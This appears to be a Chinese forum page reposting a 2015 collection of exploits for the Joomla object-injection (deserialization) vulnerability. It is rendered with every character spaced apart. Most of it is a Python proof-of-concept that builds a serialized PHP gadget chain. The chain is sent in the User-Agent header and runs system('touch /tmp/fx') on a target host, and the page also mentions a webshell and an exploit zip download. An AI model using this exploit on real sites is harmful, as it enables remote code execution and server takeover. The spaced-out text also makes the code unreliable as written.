[26579] 2015-12-18_joomla反序列化漏洞EXP(数种最近关于这个漏洞的exp)

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-19
2015-12-18_joomla反序列化漏洞EXP(数种最近关于这个漏洞的exp) j o o m l a     E X P e x p m O o n   m o o n s e c   2 0 1 5 - 1 2 - 1 8 j o o m l a     E X P ' ' '       S i m p l e   P o C   f o r   J o o m l a   O b j e c t   I n j e c t i o n .       G a r y   @   S e c - 1   l t d       h t t p : / / w w w . s e c - 1 . c o m / ' ' '   i m p o r t   r e q u e s t s   #     e a s y _ i n s t a l l   r e q u e s t s   d e f   g e t _ u r l ( u r l ,   u s e r _ a g e n t ) :           h e a d e r s   =   {         ' U s e r - A g e n t ' :   u s e r _ a g e n t         }         c o o k i e s   =   r e q u e s t s . g e t ( u r l , h e a d e r s = h e a d e r s ) . c o o k i e s         f o r   _   i n   r a n g e ( 3 ) :                 r e s p o n s e   =   r e q u e s t s . g e t ( u r l ,   h e a d e r s = h e a d e r s , c o o k i e s = c o o k i e s )                 r e t u r n   r e s p o n s e       d e f   p h p _ s t r _ n o q u o t e s ( d a t a ) :         " C o n v e r t   s t r i n g   t o   c h r ( x x ) . c h r ( x x )   f o r   u s e   i n   p h p "         e n c o d e d   =   " "         f o r   c h a r   i n   d a t a :                 e n c o d e d   + =   " c h r ( { 0 } ) . " . f o r m a t ( o r d ( c h a r ) )           r e t u r n   e n c o d e d [ : - 1 ]     d e f   g e n e r a t e _ p a y l o a d ( p h p _ p a y l o a d ) :           p h p _ p a y l o a d   =   " e v a l ( { 0 } ) " . f o r m a t ( p h p _ s t r _ n o q u o t e s ( p h p _ p a y l o a d ) )           t e r m i n a t e   =   ' x f 0 x f d x f d x f d ' ;   e x p l o i t _ t e m p l a t e   =   r ' ' ' } _ _ t e s t | O : 2 1 : " J D a t a b a s e D r i v e r M y s q l i " : 3 : { s : 2 : " f c " ; O : 1 7 : " J S i m p l e p i e F a c t o r y " : 0 : { } s : 2 1 : " 0 0 0 d i s c o n n e c t H a n d l e r s " ; a : 1 : { i : 0 ; a : 2 : { i : 0 ; O : 9 : " S i m p l e P i e " : 5 : { s : 8 : " s a n i t i z e " ; O : 2 0 : " J D a t a b a s e D r i v e r M y s q l " : 0 : { } s : 8 : " f e e d _ u r l " ; ' ' '         i n j e c t e d _ p a y l o a d   =   " { } ; J F a c t o r y : : g e t C o n f i g ( ) ; e x i t " . f o r m a t ( p h p _ p a y l o a d )   e x p l o i t _ t e m p l a t e   + =   r ' ' ' s : { 0 } : " { 1 } " ' ' ' . f o r m a t ( s t r ( l e n ( i n j e c t e d _ p a y l o a d ) ) ,   i n j e c t e d _ p a y l o a d )   e x p l o i t _ t e m p l a t e   + =   r ' ' ' ; s : 1 9 : " c a c h e _ n a m e _ f u n c t i o n " ; s : 6 : " a s s e r t " ; s : 5 : " c a c h e " ; b : 1 ; s : 1 1 : " c a c h e _ c l a s s " ; O : 2 0 : " J D a t a b a s e D r i v e r M y s q l " : 0 : { } } i : 1 ; s : 4 : " i n i t " ; } } s : 1 3 : " 0 0 0 c o n n e c t i o n " ; b : 1 ; } ' ' '   +   t e r m i n a t e           r e t u r n   e x p l o i t _ t e m p l a t e       p l   =   g e n e r a t e _ p a y l o a d ( " s y s t e m ( ' t o u c h   / t m p / f x ' ) ; " )   p r i n t   g e t _ u r l ( " h t t p : / / 1 7 2 . 3 1 . 6 . 2 4 2 / " ,   p l ) c #         h a c k U t i l s               w e b s h e l l
    j o o m l a e x p . z i p :   w w w . m o o n s e c . c o m
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则